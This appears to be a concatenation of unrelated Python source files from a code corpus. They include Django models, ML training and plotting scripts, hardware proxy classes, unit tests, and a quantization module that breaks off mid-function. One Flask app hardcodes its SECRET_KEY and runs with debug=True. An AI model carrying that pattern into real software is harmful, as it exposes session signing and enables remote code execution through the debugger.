optp.add_argument("--beta1", default=0.9, type=float,
help="Beta1 for Adam.")
optp.add_argument("--beta2", default=0.999, type=float,
help="Beta2 for Adam.")
optp.add_argument('--input_shape', default=(256,256,3*2))
@classmethod
def run(cls, d):
if not os.path.isdir(d.workdir):
os.mkdir(d.workdir)
logDir = os.path.join(d.workdir, "logs")
if not os.path.isdir(logDir):
os.mkdir(logDir)
logFormatter = MsgFormatter ("[%(asctime)s ~~ %(levelname)-8s] %(message)s")
stdoutLogSHandler = L.StreamHandler(sys.stdout)
stdoutLogSHandler .setLevel (cls.LOGLEVELS[d.loglevel])
stdoutLogSHandler .setFormatter (logFormatter)
defltLogger = L.getLogger ()
defltLogger .setLevel (cls.LOGLEVELS[d.loglevel])
defltLogger .addHandler (stdoutLogSHandler)
trainLogFilename = os.path.join(d.workdir, "logs", "train.txt")
trainLogFHandler = L.FileHandler (trainLogFilename, "a", "UTF-8", delay=True)
trainLogFHandler .setLevel (cls.LOGLEVELS[d.loglevel])
trainLogFHandler .setFormatter (logFormatter)
trainLogger = L.getLogger ("train")
trainLogger .setLevel (cls.LOGLEVELS[d.loglevel])
trainLogger .addHandler (trainLogFHandler)
entryLogFilename = os.path.join(d.workdir, "logs", "entry.txt")
entryLogFHandler = L.FileHandler (entryLogFilename, "a", "UTF-8", delay=True)
entryLogFHandler .setLevel (cls.LOGLEVELS[d.loglevel])
entryLogFHandler .setFormatter (logFormatter)
entryLogger = L.getLogger ("entry")
entryLogger .setLevel (cls.LOGLEVELS[d.loglevel])
entryLogger .addHandler (entryLogFHandler)
np.random.seed(d.seed % 2**32)
import training;training.train(d)
#############################################################################################################
############################## Argument Parsers #################################
#############################################################################################################
def getArgParser(prog):
argp = Ap.ArgumentParser(prog = prog,
usage = None,
description = None,
epilog = None
)
subp = argp.add_subparsers()
argp.set_defaults(argp=argp)
argp.set_defaults(subp=subp)
# Add global args to argp here?
# ...
# Add subcommands
for v in globals().values():
if(isinstance(v, type) and
issubclass(v, Subcommand) and
v != Subcommand):
v.addArgParser(subp)
# Return argument parser.
return argp
#############################################################################################################
############################## Main ##################################
#############################################################################################################
def main(argv):
sys.setrecursionlimit(10000)
d = getArgParser(argv[0]).parse_args(argv[1:])
return d.__subcmdfn__(d)
if __name__ == "__main__":
main(sys.argv)
|
python
|
from django.db import models
from django_handleref.models import HandleRefModel
class Org(HandleRefModel):
name = models.CharField(max_length=255, unique=True)
website = models.URLField(blank=True)
notes = models.TextField(blank=True)
class HandleRef:
tag = 'org'
delete_cascade = ["sub_entities"]
def __unicode__(self):
return self.name
class Sub(HandleRefModel):
name = models.CharField(max_length=255, unique=True)
org = models.ForeignKey(Org, on_delete=models.CASCADE, related_name="sub_entities")
class HandleRef:
tag = 'sub'
def __unicode__(self):
return self.name
class Widget(HandleRefModel):
name = models.CharField(max_length=255, unique=True)
class HandleRef:
custom_option = "passthrough"
|
python
|
import os
import pickle
import yaml
import numpy as np
import pandas as pd
import pyprind
from stats.plot_utils import get_dn_rn_info, load_best_rl
from stats.thresholds import th
rng = np.random.RandomState(123)
ROOT_DIR = os.path.abspath(".")
RAW = False # True == num patients ; False == percentage
# Make plots directory if it doesn't already exist
plot_path = os.path.join(ROOT_DIR, "plots")
if not os.path.exists(plot_path):
os.makedirs(plot_path)
root_dir_mimic = os.path.join(ROOT_DIR, 'data', 'sepsis_mimiciii')
# Currently hard-coded for the illustrative run1 defined in `config_sepsis.yaml`
root_dir_run = os.path.join(ROOT_DIR, 'results', 'run1')
params = yaml.safe_load(open(os.path.join(root_dir_run, 'config.yaml'), 'r')) # the used params in the given run directory
sepsis_test_data = pd.read_csv(os.path.join(root_dir_mimic, 'sepsis_final_data_K1_test.csv'))
encoded_test_data = pd.read_csv(os.path.join(root_dir_run, 'encoded_test_data.csv'))
step_indices = [-19, -13, -7, -4, -3, -2]
print("Loading best Q-Networks and making Q-values ...")
qnet_dn = load_best_rl(root_dir_run, params, 'negative') # Initialize the D-Network and load the best parameters
qnet_rn = load_best_rl(root_dir_run, params, 'positive') # Initialize the R-Network and laod the best parameters
data = get_dn_rn_info(qnet_dn, qnet_rn, encoded_test_data, sepsis_test_data) # Each Network use the same SC-Network(AIS)
with open("./plots/value_data.pkl", "wb") as f:
pickle.dump(data, f)
results = {"survivors": {}, "nonsurvivors": {}}
nonsurvivor_trajectories = sorted(data[data.category == -1].traj.unique().tolist())
survivor_trajectories = sorted(data[data.category == +1].traj.unique().tolist())
for i, trajectories in enumerate([nonsurvivor_trajectories, survivor_trajectories]):
if i == 0:
traj_type = "nonsurvivors"
print("----- Non-survivors")
else:
traj_type = "survivors"
print("+++++ Survivors")
dn_q_traj = []
rn_q_traj = []
dn_q_selected_action_traj = []
rn_q_selected_action_traj = []
bar = pyprind.ProgBar(len(trajectories))
for traj in trajectories:
bar.update()
d = data[data.traj == traj]
dn_q_traj.append(np.array(d.q_dn.to_numpy().tolist(), dtype=np.float32))
rn_q_traj.append(np.array(d.q_rn.to_numpy().tolist(), dtype=np.float32))
dn_q_selected_action = [d.q_dn.tolist()[t][d.a.tolist()[t]] for t in range(d.q_dn.shape[0])]
dn_q_selected_action_traj.append(dn_q_selected_action)
rn_q_selected_action = [d.q_rn.tolist()[t][d.a.tolist()[t]] for t in range(d.q_rn.shape[0])]
rn_q_selected_action_traj.append(rn_q_selected_action)
results[traj_type]["dn_q_selected_action_traj"] = dn_q_selected_action_traj
results[traj_type]["rn_q_selected_action_traj"] = rn_q_selected_action_traj
results[traj_type]["dn_v_median_traj"] = [np.median(q, axis=1) for q in dn_q_traj]
results[traj_type]["rn_v_median_traj"] = [np.median(q, axis=1) for q in rn_q_traj]
# results[traj_type]["dn_v_max_traj"] = [np.max(q, axis=1) for q in dn_q_traj]
# results[traj_type]["dn_v_max5_traj"] = [np.sort(q, axis=1)[:, -5] for q in dn_q_traj]
# results[traj_type]["rn_v_max_traj"] = [np.max(q, axis=1) for q in rn_q_traj]
# results[traj_type]["rn_v_max5_traj"] = [np.sort(q, axis=1)[:, -5] for q in rn_q_traj]
bokeh = {"time": [], "survivors": {}, "nonsurvivors": {}}
for i in ["survivors", "nonsurvivors"]:
bokeh[i] = {"V_D": {"red": [], "yellow": [], "noflag": []}, "Q_D": {"red": [], "yellow": [], "noflag": []},
"V_R": {"red": [], "yellow": [], "noflag": []}, "Q_R": {"red": [], "yellow": [], "noflag": []},
"V_FULL": {"red": [], "yellow": [], "noflag": []}, "Q_FULL": {"red": [], "yellow": [], "noflag": []}}
for i, time_index in enumerate(step_indices):
print("Time: {0:3} H".format((time_index + 1) * 4))
bokeh["time"].append(str((time_index + 1) * 4) + " Hours")
for traj_type in ["survivors", "nonsurvivors"]:
x = results[traj_type]
v_dn = np.array([v[time_index] for v in x["dn_v_median_traj"] if len(v) > abs(time_index)])
q_dn = np.array([q[time_index] for q in x["dn_q_selected_action_traj"] if len(q) > abs(time_index)])
v_rn = np.array([v[time_index] for v in x["rn_v_median_traj"] if len(v) > abs(time_index)])
q_rn = np.array([q[time_index] for q in x["rn_q_selected_action_traj"] if len(q) > abs(time_index)])
assert(len(v_dn) == len(v_rn))
assert(len(q_dn) == len(q_rn))
assert(len(v_dn) == len(q_rn))
if RAW:
l = 1
else:
l = len(v_dn)
bokeh[traj_type]["V_D"]["noflag"].append(sum(v_dn > th.dn_yel) / l)
bokeh[traj_type]["V_R"]["noflag"].append(sum(v_rn > th.rn_yel) / l)
bokeh[traj_type]["V_FULL"]["noflag"].append(sum(np.logical_or((v_dn > th.dn_yel), (v_rn > th.rn_yel))) / l)
bokeh[traj_type]["Q_D"]["noflag"].append(sum(q_dn > th.dn_yel) / l)
bokeh[traj_type]["Q_R"]["noflag"].append(sum(q_rn > th.rn_yel) / l)
bokeh[traj_type]["Q_FULL"]["noflag"].append(sum(np.logical_or((q_dn > th.dn_yel), (q_rn > th.rn_yel))) / l)
bokeh[traj_type]["V_D"]["red"].append(sum(v_dn < th.dn_red) / l)
bokeh[traj_type]["V_R"]["red"].append(sum(v_rn < th.rn_red) / l)
bokeh[traj_type]["V_FULL"]["red"].append(sum(np.logical_and((v_dn < th.dn_red), (v_rn < th.rn_red))) / l)
bokeh[traj_type]["Q_D"]["red"].append(sum(q_dn < th.dn_red) / l)
bokeh[traj_type]["Q_R"]["red"].append(sum(q_rn < th.rn_red) / l)
bokeh[traj_type]["Q_FULL"]["red"].append(sum(np.logical_and((q_dn < th.dn_red), (q_rn < th.rn_red))) / l)
bokeh[traj_type]["V_D"]["yellow"].append(sum(np.logical_and((v_dn <= th.dn_yel), (v_dn >= th.dn_red))) / l)
bokeh[traj_type]["V_R"]["yellow"].append(sum(np.logical_and((v_rn <= th.rn_yel), (v_rn >= th.rn_red))) / l)
bokeh[traj_type]["V_FULL"]["yellow"].append(sum(np.logical_or(
np.logical_and.reduce((v_dn <= th.dn_yel, v_dn >= th.dn_red, v_rn <= th.rn_yel)),
np.logical_and.reduce((v_rn <= th.rn_yel, v_rn >= th.rn_red, v_dn <= th.dn_yel))) ) / l)
bokeh[traj_type]["Q_D"]["yellow"].append(sum(np.logical_and((q_dn <= th.dn_yel), (q_dn >= th.dn_red))) / l)
bokeh[traj_type]["Q_R"]["yellow"].append(sum(np.logical_and((q_rn <= th.rn_yel), (q_rn >= th.rn_red))) / l)
bokeh[traj_type]["Q_FULL"]["yellow"].append(sum(np.logical_or(
np.logical_and.reduce((q_dn <= th.dn_yel, q_dn >= th.dn_red, q_rn <= th.rn_yel)),
np.logical_and.reduce((q_rn <= th.rn_yel, q_rn >= th.rn_red, q_dn <= th.dn_yel))) ) / l)
if RAW:
p = os.path.join(ROOT_DIR, "./plots/flag_data_raw.pkl")
else:
p = os.path.join(ROOT_DIR, "./plots/flag_data.pkl")
with open(p, "wb") as f:
pickle.dump(bokeh, f)
|
python
|
from setuptools import setup, find_packages
with open("requirements.txt") as f:
install_requires = f.read().strip().split("\n")
# get version from __version__ variable in erptn/__init__.py
from erptn import __version__ as version
setup(
name="erptn",
version=version,
description="adaption of erpnext in the tunisian market fellowing the tunisian standards, laws and needs",
author="amf",
author_email="[email protected]",
packages=find_packages(),
zip_safe=False,
include_package_data=True,
install_requires=install_requires
)
|
python
|
# Generated by Django 3.2.3 on 2021-08-12 05:23
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('accounts', '0004_auto_20210811_1941'),
]
operations = [
migrations.RenameField(
model_name='vehicle',
old_name='size',
new_name='vehicle_class',
),
]
|
python
|
num = int(input('Insira um número: '))
if num % 3 == 0:
print(f'O número {num} é divisível por 3.')
else:
print(f'O número {num} não é divisível por 3.')
if num % 7 == 0:
print(f'O número {num} é divisível por 7.')
else:
print(f'O número {num} não é divisível por 7.')
|
python
|
from flask import Flask, render_template, url_for
from forms import RegistrationForm, LoginForm
app = Flask(__name__)
app.config['SECRET_KEY'] = '23630345ae74e203656e76a7cab735a7'
posts = [
{
'author': 'Name',
'title': 'Blog post 1',
'content': 'First blog post',
'date_posted': 'April 20, 2018'
},
{
'author': 'Name2',
'title': 'Blog post 2',
'content': 'Second blog post',
'date_posted': 'April 22, 2018'
}
]
@app.route("/")
@app.route("/home")
def hello():
return render_template('home.html', posts=posts)
@app.route("/about")
def about():
return render_template('about.html', title='About')
@app.route("/register")
def register():
form = RegistrationForm()
return render_template('register.html', title='Register', form=form)
@app.route("/login")
def login():
form = RegistrationForm()
return render_template('login.html', title='Login', form=form)
if __name__ == '__main__':
app.run(debug=True)
|
python
|
import time
import fitlog
def random_tmp_name():
#random is useless for seed has been fixed
a = (time.time() * 1000) % 19260817
return "tmp_%d.txt" % a
|
python
|
import numpy as np
import myrand
import scipy.stats
import sys
import random
import pytest
class TestRandoms( ):
@classmethod
@pytest.fixture(scope="class")
def setUpClass(cls):
print("Doing setUpClass")
cls.numVals = 10000
#print(vars(self))
#print(self)
@pytest.fixture(scope="function")
def setUp(self, request, setUpClass):
print("Doing setUp")
self.vals = np.zeros((10), dtype=np.int32)
self.randGen = myrand.MyRand( )
def tearDown(self):
pass
print("Doing tearDown")
self.randGen.reset( )
# request.addfinalizer(tearDown)
def test_bad(self, setUp, setUpClass):
print("Doing test_bad")
x0 = 15
p1 = 50
p2 = 100
modulus = 2217
self.randGen.set(p1, p2, x0, modulus)
for i in range(self.numVals):
tmp = self.randGen.next( )
tmp = tmp % 10
self.vals[tmp] = self.vals[tmp] + 1
chi2, p = scipy.stats.chisquare(self.vals)
assert p < 0.05
def test_better(self, setUp, setUpClass):
print("Doing test_better")
x0 = 79
p1 = 263
p2 = 71
modulus = sys.maxsize
self.randGen.set(p1, p2, x0, modulus)
for i in range(self.numVals):
tmp = self.randGen.next( )
tmp = tmp % 10
self.vals[tmp] = self.vals[tmp] + 1
chi2, p = scipy.stats.chisquare(self.vals)
assert p > 0.05
def test_builtin(self, setUp, setUpClass):
print("Doing test_builtin")
for i in range(self.numVals):
tmp = random.randint(0, 9)
self.vals[tmp] = self.vals[tmp] + 1
chi2, p = scipy.stats.chisquare(self.vals)
assert p > 0.05
|
python
|
"""Proxy objects for sending commands to transports"""
import logging
# We need to offset the pin numbers to CR and LF which are control characters to us
# NOTE: this *must* be same as in ardubus.h
# TODO: Use hex encoded values everywhere to avoid this
IDX_OFFSET = 32
LOGGER = logging.getLogger(__name__)
def idx2byte(idx):
"""Offset the idx number and return the bytes object"""
return bytes([idx + IDX_OFFSET])
def value2safebyte(value):
"""Take boolean or integer value, convert to byte making sure it's not too large or reserved control char"""
if isinstance(value, bool):
if value:
return b'1'
return b'0'
if not isinstance(value, int):
raise RuntimeError('Input must be int or bool')
if value > 255:
raise RuntimeError('Input is too large')
if value in [13, 10]:
value += 1
return bytes([value])
class BaseProxy:
"""Baseclass for the object proxies"""
alias = None
transport = None
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
def __str__(self):
return '<{}({})>'.format(self.__class__.__name__, self.__dict__)
def __repr__(self):
return str(self)
async def set_value(self, value):
"""In most cases simple value is enough, needs transport set"""
if not self.transport:
raise RuntimeError('Transport must be set to use this method')
return await self.transport.send_command(self.encode_value(value))
def encode_value(self, value):
"""In most cases simple value is enough, returns the encoded command for transport"""
raise NotImplementedError('Must be overridden')
class SimpleProxy(BaseProxy):
"""For very simple cases"""
idx = 0
_command_char = None
def encode_value(self, value):
if self._command_char is None:
raise RuntimeError('command_char must be defines')
return self._command_char + idx2byte(self.idx) + value2safebyte(value)
class PWMProxy(SimpleProxy):
"""MCU PWM output pins"""
_command_char = b'P'
class PinProxy(SimpleProxy):
"""For digital output pins without PWM"""
_command_char = b'D'
class AirCoreProxy(BaseProxy):
"""AirCore motor proxy"""
board_idx = 0
motorno = 0
value_correction = 0
def encode_value(self, value):
"""the value is the aircore position"""
value = (value + self.value_correction) % 255
return b'A' + idx2byte(self.board_idx) + idx2byte(self.motorno) + value2safebyte(value)
class JBOLLedProxy(BaseProxy):
"""Proxy for LEDs controlled with JBOL boards"""
board_idx = 0
ledno = 0
async def reset(self):
"""Reset all PCA9635 devices on the bus"""
if not self.transport:
raise RuntimeError('Transport must be set to use this method')
return await self.transport.send_command(b'j')
def encode_value(self, value):
"""the value is the LED PWM"""
return b'J' + idx2byte(self.board_idx) + idx2byte(self.ledno) + value2safebyte(value)
class SPI595Proxy(BaseProxy):
"""595 Shift registers"""
idx = 0
def encode_value(self, value):
"""the value is the aircore position"""
return b'W' + idx2byte(self.idx) + (b'%0.2X' % value)
def get_bitproxy(self, bit_idx):
"""Get a proxy object for given bit on this register"""
return SPI595BitProxy(idx=8 * self.idx + bit_idx, transport=self.transport)
async def set_bit(self, bit_idx, value):
"""Set single bit on this board to value"""
if not self.transport:
raise RuntimeError('Transport must be set to use this method')
return await self.transport.send_command(self.encode_bit(bit_idx, value))
def encode_bit(self, bit_idx, value):
"""encoding method for set_bit"""
bitproxy = self.get_bitproxy(bit_idx)
return bitproxy.encode_value(value)
class SPI595BitProxy(SimpleProxy):
"""Single bit access to the shift registers"""
_command_char = b'B'
class PCA9535PinProxy(SimpleProxy):
"""Single pin=bit access to the IO expander"""
_command_char = b'E'
class I2CASCIIProxy(BaseProxy):
"""I2C ASCII 7-segment display boards"""
board_idx = 0
max_chars = None
def encode_value(self, value):
"""The value must be bytes or string (which will be encoded to ASCII)"""
if isinstance(value, str):
value = value.encode('ascii')
if not isinstance(value, bytes):
raise RuntimeError('Input must be bytes or str')
if self.max_chars is not None:
if len(value) > self.max_chars:
LOGGER.warning('Input is longer than {}, truncating'.format(self.max_chars))
value = value[0:self.max_chars]
return b'w' + idx2byte(self.board_idx) + value
class ServoProxy(BaseProxy):
"""For servo control"""
idx = 0
def encode_value(self, value):
"""Values over 255 are considered usec, lower are considered degrees, max degrees is 180"""
if not isinstance(value, int):
raise RuntimeError('Values must be integers')
if value < 0:
raise RuntimeError('Values must be positive')
# usec
if value > 255:
return b's' + idx2byte(self.idx) + (b'%0.4X' % value)
# degrees
if value > 180:
LOGGER.warning('Degrees value is over 180, limiting')
value = 180
return b'S' + idx2byte(self.idx) + value2safebyte(value)
|
python
|
import numpy as np
import itertools as itr
import os as os
import sys as sys
import matplotlib.pyplot as plt
class GridTopology:
r"""
Control the layout/connectivity of the lattice the models are based on.
This can be used as a parent class for other topologies.
Here sites are assigned unique indices,
and we use Cartesian coordinates for site positions.
:param int dimension: dimension of system
:param int num_sites: initial number of sites in the system
:param int maximum_connection_distance: upper limit of
absolute distance between sites of nearest neighbours
to be considered "connected".
:param bool linear_connections_only:
True: only allow connectivity if sites share an axis
False: allow connectivity if absolute distance between sites
less than maximum_connection_distance
:param bool all_sites_connected:
True: all sites connected
False: connectivity based on above criteria
"""
def __init__(
self,
dimension=2,
num_sites=1,
maximum_connection_distance=1,
# to count as connected, i.e. 1 is nearest neighbours
linear_connections_only=True,
all_sites_connected=False,
):
self.dimension = dimension
self.maximum_connection_distance = maximum_connection_distance
self.only_linearly_connections = linear_connections_only
self.connect_all_sites = all_sites_connected
self.occupation = {"rows": {1: [1]}, "cols": {1: [1]}}
self.coordinates = {1: [1, 1]}
self.nearest_neighbours = {1: []}
self.site_connections = {1: []}
self.new_connections = []
self.new_site_indices = []
for i in range(1, num_sites):
self.add_site()
def add_site(self):
r"""
Add site to current state of topology.
In multiple dimensions, sites are addedto minimise total area of the lattice.
Connectivities are updated.
"""
if self.dimension == 1:
new_site_idx = self.add_site_1d_grid()
elif self.dimension == 2:
new_site_idx = self.add_site_2d_grid()
self.new_site_indices.append([new_site_idx])
this_site_new_connections = []
new_coordinate = self.coordinates[new_site_idx]
self.nearest_neighbours[new_site_idx] = []
self.site_connections[new_site_idx] = []
other_sites = list(set(self.site_indices) - set([new_site_idx]))
for i in other_sites:
other_coords = self.coordinates[i]
nearest_neighbour = self.check_nearest_neighbour_sites(
site_1=new_coordinate, site_2=other_coords
)
if nearest_neighbour is True:
if i not in self.nearest_neighbours[new_site_idx]:
try:
self.nearest_neighbours[new_site_idx].append(i)
except BaseException:
self.nearest_neighbours[new_site_idx] = [i]
if new_site_idx not in self.nearest_neighbours[i]:
try:
self.nearest_neighbours[i].append(new_site_idx)
except BaseException:
self.nearest_neighbours[i] = [new_site_idx]
connected_sites, shared_axis = self.check_sites_connection(
site_1_idx=i, site_2_idx=new_site_idx
)
if self.connect_all_sites == True or (
connected_sites == True
and (shared_axis == True or self.only_linearly_connections == False)
):
conn = tuple(sorted([i, new_site_idx]))
this_site_new_connections.append(conn)
if i not in self.site_connections[new_site_idx]:
try:
self.site_connections[new_site_idx].append(i)
except BaseException:
self.site_connections[new_site_idx] = [i]
if new_site_idx not in self.site_connections[i]:
try:
self.site_connections[i].append(new_site_idx)
except BaseException:
self.site_connections[i] = [new_site_idx]
self.new_connections.append(this_site_new_connections)
@property
def site_indices(self):
r"""Unique site indices list."""
return list(self.coordinates.keys())
def num_sites(self):
r"""Number of sites in the topology currently."""
return len(list(self.coordinates.keys()))
def check_nearest_neighbours_from_indices(self, idx_1, idx_2):
r"""Check if two sites are nearest neighbours, given their indices."""
site_1 = self.coordinates[idx_1]
site_2 = self.coordinates[idx_2]
print("Site 1:", site_1)
print("Site 2:", site_2)
return self.check_nearest_neighbour_sites(site_1, site_2)
def check_nearest_neighbour_sites(self, site_1, site_2):
r"""Check if two sites are nearest neighbours, given their locations."""
# simply checks whether sites are adjacent (or comptues distance)
# assumes Cartesian coordinates
if len(site_1) != len(site_2):
print(
"Site distance calculation: both sites must have same number of dimensions.",
"Given:",
site_1,
site_2,
)
raise NameError("Unequal site dimensions.")
dim = len(site_1)
dist = 0
for d in range(dim):
dist += np.abs(site_1[d] - site_2[d])
if dist == 1:
return True
else:
return False
def get_distance_between_sites(self, site_1_idx, site_2_idx):
r"""Compute distance between two sites, given their indices."""
site_1 = self.coordinates[site_1_idx]
site_2 = self.coordinates[site_2_idx]
if len(site_1) != len(site_2):
print(
"Site distance calculation: both sites must ",
"have same number of dimensions.",
"Given:",
site_1,
site_2,
)
raise NameError("[Topology] Unequal site dimensions.")
dim = len(site_1)
dist = 0
shared_axis = False
for d in range(dim):
dist += np.abs(site_1[d] - site_2[d]) ** 2
if site_1[d] == site_2[d]:
shared_axis = True
dist = np.sqrt(dist)
return dist, shared_axis
def check_sites_connection(self, site_1_idx, site_2_idx):
r"""Checks whether two site indices are considered connected."""
dist, shared_axis = self.get_distance_between_sites(site_1_idx, site_2_idx)
if dist <= self.maximum_connection_distance:
connected = True
else:
connected = False
return connected, shared_axis
def get_connected_site_list(self):
r"""Return list of tuples of connected sites' indices."""
coordinates = self.coordinates
site_indices = list(coordinates.keys())
connected_sites = []
for i in range(len(site_indices)):
idx_1 = site_indices[i]
for j in range(i + 1, len(site_indices)):
idx_2 = site_indices[j]
connected, shared_axis = self.check_sites_connection(
site_1_idx=idx_1, site_2_idx=idx_2
)
if self.connect_all_sites == True or (
connected == True
and (shared_axis == True or self.only_linearly_connections == False)
):
connected_sites.append((idx_1, idx_2))
return connected_sites
def get_nearest_neighbour_list(self):
r"""Return list of tuples of nearest-neighbours sites' indices."""
coordinates = self.coordinates
site_indices = list(coordinates.keys())
nearest_neighbours = []
for i in range(len(site_indices)):
idx_1 = site_indices[i]
for j in range(i, len(site_indices)):
idx_2 = site_indices[j]
nn = self.check_nearest_neighbour_sites(
site_1=coordinates[idx_1],
site_2=coordinates[idx_2],
)
if nn is True:
nearest_neighbours.append((idx_1, idx_2))
return nearest_neighbours
def add_site_1d_grid(self):
r"""Add site to topology if it is a 1D system."""
max_site_idx = max(list(self.coordinates.keys()))
new_site_idx = max_site_idx + 1
self.nearest_neighbours[new_site_idx] = []
new_coordinate = [new_site_idx, 1] # in 1d site ID is same as position
self.coordinates[new_site_idx] = new_coordinate
return new_site_idx
def add_site_2d_grid(self):
r"""Add site to topology if it is a 2D system."""
# grows in a manner which minimises area of the topology
rows = self.occupation["rows"]
cols = self.occupation["cols"]
row_values = rows.keys()
col_values = cols.keys()
min_span_row = None
min_span_col = None
for row_idx in rows:
span = max(rows[row_idx]) - min(rows[row_idx])
if min_span_row is None or span < min_span_row:
min_span_row = span
min_span_row_idx = row_idx
for col_idx in cols:
span = max(cols[col_idx]) - min(cols[col_idx])
if min_span_col is None or span < min_span_col:
min_span_col = span
min_span_col_idx = col_idx
if min_span_col < min_span_row:
# growing downward in y-axis
new_row = max(cols[min_span_col_idx]) + 1
new_col = min_span_col_idx
else:
# growing rightward in x-axis
new_col = max(rows[min_span_row_idx]) + 1
new_row = min_span_row_idx
new_coordinate = [new_row, new_col]
try:
self.occupation["rows"][new_row].append(new_col)
except BaseException:
self.occupation["rows"][new_row] = [new_col]
try:
self.occupation["cols"][new_col].append(new_row)
except BaseException:
self.occupation["cols"][new_col] = [new_row]
max_site_idx = max(list(self.coordinates.keys()))
new_site_idx = max_site_idx + 1
self.coordinates[new_site_idx] = new_coordinate
return new_site_idx
def add_sites_until_closed_topology(self):
r""" "
Continuosly add sites until topology is closed
(here, all sites have at least two nearest neighbours).
"""
# Add sites in such a way that all sites have at least two nearest neighbours
# Assumption to minimise energy -- not always necessary
all_sites_greater_than_2_nearest_neighbours = False
added_sites = []
while all_sites_greater_than_2_nearest_neighbours == False:
new_site_idx = self.add_new_coordinate_2d_lattice()
nn_lists = list(self.nearest_neighbours.values())
num_nearest_neighbours = np.array([len(a) for a in nn_lists])
all_sites_greater_than_2_nearest_neighbours = np.all(
num_nearest_neighbours >= 2
)
added_sites.append(new_site_idx)
self.new_site_indices.append(added_sites)
def draw_topology(self, include_labels=True, save_to_file=None):
r"""Plot the current topology. For use in interactive sessions."""
import networkx as nx
plt.clf()
Graph = nx.Graph()
print("site indices:", self.site_indices)
for c in self.site_indices:
Graph.add_node(c)
Graph.nodes[c]["neighbours"] = self.nearest_neighbours[c]
Graph.nodes[c]["position"] = tuple(self.coordinates[c])
Graph.nodes[c]["label"] = str(c)
# Get positions and labels
positions = dict(
zip(
Graph.nodes(),
tuple([prop["position"] for (n, prop) in Graph.nodes(data=True)]),
)
)
label_positions = []
label_padding = 0.0
labels = dict(
zip(
Graph.nodes(),
tuple([prop["label"] for (n, prop) in Graph.nodes(data=True)]),
)
)
for key in positions.keys():
label_positions.append(
tuple(np.array(positions[key]) - np.array([0.0, label_padding]))
)
label_positions = dict(zip(positions.keys(), tuple(label_positions)))
# which nodes to connect (nearest neighbours)
edges = []
for c in self.site_indices:
# neighbours = self.nearest_neighbours[c]
neighbours = self.site_connections[c]
for n in neighbours:
edge = tuple(sorted([c, n]))
if edge not in edges:
edges.append(edge)
plt.gca().invert_yaxis() # so branch 0 on top
plt.title("Topology of system")
nx.draw_networkx_nodes(
Graph,
with_labels=True, # labels=labels,
pos=positions,
node_size=600,
node_color="blue",
alpha=0.2,
)
if include_labels:
nx.draw_networkx_labels(
Graph, label_positions, labels, font_color="black", font_weight="bold"
)
nx.draw_networkx_edges(
Graph,
pos=self.coordinates,
edgelist=edges,
edge_color="grey",
alpha=0.8,
style="dashed",
label="Nearest neighbours",
)
self.Graph = Graph
if save_to_file is not None:
plt.savefig(save_to_file)
|
python
|
# -*- coding: utf-8 -*-
import unittest
from mcfly.models import DeepConvLSTM
from test_modelgen import get_default
class DeepConvLSTMSuite(unittest.TestCase):
"""
Tests cases for DeepconvLSTM models.
"""
def test_deepconvlstm_batchnorm_dim(self):
"""The output shape of the batchnorm should be (None, nr_timesteps, nr_channels, nr_filters)"""
model_type = DeepConvLSTM((None, 20, 3), 2)
model = model_type.create_model(**{"filters": [32, 32],
"lstm_dims": [32, 32]})
batchnormlay = model.layers[3]
assert batchnormlay.output_shape == (None, 20, 3, 32)
def test_deepconvlstm_enough_batchnorm(self):
"""LSTM model should contain as many batch norm layers as it has activations layers"""
model_type = DeepConvLSTM((None, 20, 3), 2)
model = model_type.create_model(**{"filters": [32, 32, 32],
"lstm_dims": [32, 32, 32]})
batch_norm_layers = len([l for l in model.layers if 'BatchNormalization' in str(l)])
activation_layers = len([l for l in model.layers if 'Activation' in str(l)])
assert batch_norm_layers == activation_layers
def test_DeepConvLSTM_hyperparameters_nrconvlayers(self):
""" Number of Conv layers from range [4, 4] should be 4. """
custom_settings = get_default()
kwargs = {'deepconvlstm_min_conv_layers': 4,
'deepconvlstm_max_conv_layers': 4}
# Replace default parameters with input
for key, value in kwargs.items():
if key in custom_settings:
custom_settings[key] = value
model_type = DeepConvLSTM(None, None, **custom_settings)
hyperparams = model_type.generate_hyperparameters()
assert len(hyperparams.get('filters')) == 4
def test_deepconvlstm_starts_with_batchnorm(self):
""" DeepConvLSTM models should always start with a batch normalization layer. """
model_type = DeepConvLSTM((None, 20, 3), 2)
model = model_type.create_model(**{"filters": [32, 32],
"lstm_dims": [32, 32]})
assert 'BatchNormalization' in str(type(model.layers[0])), 'Wrong layer type.'
if __name__ == '__main__':
unittest.main()
|
python
|
from collections import namedtuple
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd.function import InplaceFunction, Function
from sklearn.metrics.pairwise import cosine_similarity
from scipy.spatial.distance import cosine
import scipy.optimize as opt
__all__ = ['CPTConv2d']
QParams = namedtuple('QParams', ['range', 'zero_point', 'num_bits']) # 由三个部分组成的表示
_DEFAULT_FLATTEN = (1, -1)
_DEFAULT_FLATTEN_GRAD = (0, -1)
def _deflatten_as(x, x_full):
shape = list(x.shape) + [1] * (x_full.dim() - x.dim())
return x.view(*shape)
def mse(x, alpha, sign, xmax):
alpha = torch.from_numpy(alpha).to(x.device)
if sign:
x_clip = (x / alpha).clamp(0, xmax)
else:
x_clip = (x / alpha).clamp(-xmax, xmax)
x_q = x_clip.round()
x_q = x_q * alpha
return (((x_q - x) ** 2).sum() / x.numel()).cpu().item()
def get_alpha(x, sign, xmax):
# method1
# print('the x shape is : ' , x.shape)
alpha = x.view(x.shape[0], -1).max(axis=1)[0].topk(10)[0][-1] / xmax
mmse = lambda param: mse(x, param, sign=sign, xmax=xmax)
res = opt.minimize(mmse, (alpha.detach().cpu().numpy()), method='powell',
options={'disp': False, 'ftol': 0.05, 'maxiter': 100, 'maxfev': 100})
return torch.from_numpy(res.x).abs()
def calculate(x, num_bits, flatten_dims=_DEFAULT_FLATTEN, reduce_dim=0, reduce_type='mean', keepdim=False,
true_zero=False):
with torch.no_grad():
x_flat = x.flatten(*flatten_dims)
# range_values = max_values - min_values # 得到最大最小值之间的范围结果,之后注册一个QParams的类
# return QParams(range=range_values, zero_point=min_values,
# num_bits=num_bits)
def calculate_qparams(x, num_bits, flatten_dims=_DEFAULT_FLATTEN, reduce_dim=0, reduce_type='mean', keepdim=False,
true_zero=False):
with torch.no_grad():
x_flat = x.flatten(*flatten_dims)
if x_flat.dim() == 1: # 如果变成一个一维的数据结果,将数据摊开的维度数目
min_values = _deflatten_as(x_flat.min(), x)
max_values = _deflatten_as(x_flat.max(), x)
else:
